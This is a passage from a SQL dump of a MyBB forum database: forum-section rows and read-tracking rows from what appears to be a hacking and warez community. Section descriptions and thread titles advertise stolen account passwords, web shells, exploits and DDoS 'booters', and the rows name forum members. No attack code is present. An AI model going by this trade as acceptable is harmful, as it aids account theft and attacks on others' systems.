for download.', '', 'f', '31', '31,54', '3', '1', '1', '28', '66', '1352024025', 'sbhshroy2', '255', '1191', '[4 nov]HUGE MIXXX OF WORKING PASSES FOR 4.NOV.2012', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '1', 'Rules for this forum', '1. Any leechers or password changer on being caught would be permanently banned. 2. No keylog dumps, only premium accounts. ', '0', '0', '0', '', '', 'my-account.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('55', 'Gay Free Requests', 'Need something for free? Post your requests here. ', '', 'f', '28', '31,28,55', '1', '1', '1', '8', '26', '1347481482', 'iTzIpod', '82', '369', 'Paypal 1 dollar 50cents', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', '10.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('56', 'Forum Games ', 'All forum games will be held here. ', '', 'f', '7', '6,7,56', '1', '1', '1', '8', '468', '1352648045', 'iTzIpod', '82', '238', 'Ban the user above you', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '1', 'Rules for this forum', '1. Threads with 100 or more posts will be closed. 2. No offsite games. 3. You can not post more than thrice a day in the same thread.', '0', '0', '0', '', '', 'package_games_emulator.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('57', 'Groups ', '', '', 'c', '0', '57', '8', '1', '1', '0', '0', '0', '', '0', '0', '', '0', '1', '1', '1', '1', '1', '1', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'shim.gif', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('58', 'Group Recruitments and Discussions', 'For all topics regarding custom user groups such as recruitment, joining questions, and other threads about groups please post here.', '', 'f', '57', '57,58', '1', '1', '1', '16', '188', '1351549156', 'VirtualLegend', '228', '1094', 'The Marketers - Official Recruitment | Join us Today !', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'groups.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('59', 'Ebooks', 'Download all electronics books on Hacking here. ', '', 'f', '12', '10,12,59', '1', '1', '1', '12', '39', '1351541469', 'Mac Miller', '302', '1137', '[Ebook]Make $50+ a day usuing AdSense', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'book.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('61', 'Unique Headquarters', 'Unique groups private forum. ', '', 'f', '57', '57,61', '2', '1', '1', '74', '259', '1352648872', 'VirtualLegend', '228', '1040', 'How To Get Passes To Porn Sites', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'qvfmJ.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('63', 'Requests', 'Need a signature, userbar, avatar or logo? Request em here. ', '', 'f', '32', '32,63', '3', '1', '1', '8', '91', '1352603954', 't3h jok3r', '1', '1170', 'Need a sig', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'gnome_applications_graphics.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('64', 'Movie & TV RIPs, Streams etc', 'Want to watch a newly released movie online? Want to watch your favorite TV serial online? This is the right place for you.', '', 'f', '65', '6,65,64', '1', '1', '1', '18', '43', '1352519425', 'Triple H', '4', '1201', 'Sinister Movie Rip', '0', '1', '1', '1', '1', '1', '1', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'redhat-sound_video.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('65', 'Movie', 'Discuss about your favorite movies here. Get reviews about the latest movies here. ', '', 'f', '6', '6,65', '4', '1', '1', '11', '75', '1352809466', 'mothered', '205', '1254', 'Who\'s watched The Social Network movie?', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'film.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('66', 'Gamers', 'Gamers Private Forum. We talk about all things game related. If It\'s game Talk, Cheats, Guides, Releases We talk about it here!', '', 'f', '57', '57,66', '3', '1', '1', '6', '39', '1351167089', 'NXK', '61', '613', 'Some Changes that will be made', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'gamer.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('68', 'Other', 'Other coding discussions that don\'t have a forum should be discussed here. ', '', 'f', '51', '51,68', '5', '1', '1', '5', '13', '1352527014', 'spacefish36', '8', '1243', 'Simple Perl Booter', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'media-scripts.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('67', 'PHP', 'PHP is mainly used to define classes and functions and is the leading web programming language because of its strength & simplicity.', '', 'f', '51', '51,67', '4', '1', '1', '6', '19', '1352820202', 'HoverCatz', '67', '1238', 'Slowlowirs Shell .PHP file', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'application-x-php.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('69', 'General', 'Discussions related to coding can be discussed here. Please do not post any tutorials in this forum. ', '', 'f', '51', '51,69', '1', '1', '1', '3', '19', '1352349889', 'p420', '9', '1223', '[Release] IP Manager', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'web_coding.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('70', 'Gaming', '', '', 'c', '0', '70', '9', '1', '1', '0', '0', '0', '', '0', '0', '', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'shim.gif', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('71', 'Gamers Lounge', 'A place to chill for all the gamers. ', '', 'f', '70', '70,71', '1', '1', '1', '16', '80', '1352230628', 'VirtualLegend', '228', '951', 'L33thacking Minecraft Server', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'games.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('72', 'Consoles', 'Discussions on famous gaming consoles such as Playstation 3 and Xbox should be held here. ', '', 'f', '70', '70,72', '2', '1', '1', '8', '52', '1351749562', 'Timmy', '5', '1146', 'DO NOT BUY NFS Most Wanted', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'console.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('73', 'Mobile and Tablet Gaming', 'For those who have Kindles, IOS, Androids, and Tablet needs post them here. ', '', 'f', '70', '70,73', '3', '1', '1', '12', '54', '1352230724', 'VirtualLegend', '228', '1168', 'Temple Run or Subway Surfer?', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'ipad.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('74', 'Online and Computer Gaming', 'Discuss your favorite games here. Topics include Counter Strike, Minecraft, Texas Hold\'em Poker etc.', '', 'f', '70', '70,74', '4', '1', '1', '20', '171', '1352000872', 'RAND0M1ZER', '262', '1087', 'GEARS OF WAR :P', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'orange_folder_games.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('75', 'Cheats, Walkthrough and Codes', 'Need cheats? Share your favorite codes, cheats and walkthroughs on your favorite games here. ', '', 'f', '70', '70,75', '5', '1', '1', '6', '16', '1352530472', 'Timmy', '5', '1167', 'Batman Arkham City Cheats', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'games_black.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('76', 'Playstation 3', 'The top rated console for having the best graphic design and other cool features. ', '', 'f', '72', '70,72,76', '1', '1', '1', '3', '14', '1350800076', 'XxTREYZxX', '257', '1021', 'rage cheats and tips', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'playstation_3_standing_icon.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('77', 'Xbox 360', 'The Xbox 360 is the second video game console developed by and produced for Microsoft and the successor to the Xbox also competes with the Sony\'s PS3 and Wii.', '', 'f', '72', '70,72,77', '2', '1', '1', '2', '10', '1351648312', 'CommandoModz', '306', '893', 'GamerTag Availability Checker Site', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'xbox_360.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('79', 'Coders', 'The goal of LHC (LH Coders) is to create a unique group of coders who are willing to support and bring amazing content to this forum. ', '', 'f', '57', '57,79', '4', '1', '1', '1', '4', '1351506225', 'HoverCatz', '67', '864', 'Need some coder to check this code', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', '1lVmr.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('81', 'DDoSers', 'Find the best booters here. Learn to create booters, DDoSers, post your requests etc.', '', 'f', '57', '57,81', '5', '1', '1', '4', '13', '1352524892', 't3h jok3r', '1', '1240', 'Some private shells', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'dos.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('82', 'The Marketers Palace', 'We are a High Quality group all about Money Making.', '', 'f', '57', '57,82', '6', '1', '1', '3', '5', '1351387800', 'Apathy', '2', '1119', 'Simple Clickbank - Step By Step Tutorial [ The Ultimate Clickbank System ]', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'uP3eg.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('83', 'Miscellaneous Tutorials and Guides', 'All tutorials and guides that don\'t belong in any other section should be posted here.', '', 'f', '7', '6,7,83', '2', '1', '1', '7', '24', '1352528646', 'Timmy', '5', '1244', '[How to] Send a DMCA takedown notice', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '1', 'Rules for this forum', '1. No distributing of porn, pedophile or any similar sort of discussion. 2. No illegal tutorials such as murdering, stealing etc. 3. No program giveaways in this section. 4. No tutorials on weapons creation. 5. No blackhat activity discussions here.', '0', '0', '0', '', '', 'tutorial.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('84', 'Other Premium Giveaways', 'This section for sharing exploits, VPNs, Shells etc. Anything that doesn\'t fall under the sections above belong in here.', '', 'f', '31', '31,84', '5', '1', '1', '4', '25', '1352820667', 'HoverCatz', '67', '1239', '800 shells', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'treasure.png', '0'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_forumsread`; CREATE TABLE `mybb_forumsread` ( `fid` int(10) unsigned NOT NULL DEFAULT '0', `uid` int(10) unsigned NOT NULL DEFAULT '0', `dateline` int(10) NOT NULL DEFAULT '0', UNIQUE KEY `fid` (`fid`,`uid`), KEY `dateline` (`dateline`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; LOCK TABLES `mybb_forumsread` WRITE; INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('3', '1', '1352823595'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('29', '1', '1352771075'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('81', '61', '1352577397'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('17', '323', '1352479043'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('7', '1', '1352662506'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('19', '1', '1352492781'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('9', '53', '1352542075'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('42', '262', '1352422979'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('54', '255', '1352373119'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('59', '323', '1352478612'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('5', '1', '1352661425'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('56', '257', '1352619010'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('18', '53', '1352536521'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('20', '339', '1352508437'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('42', 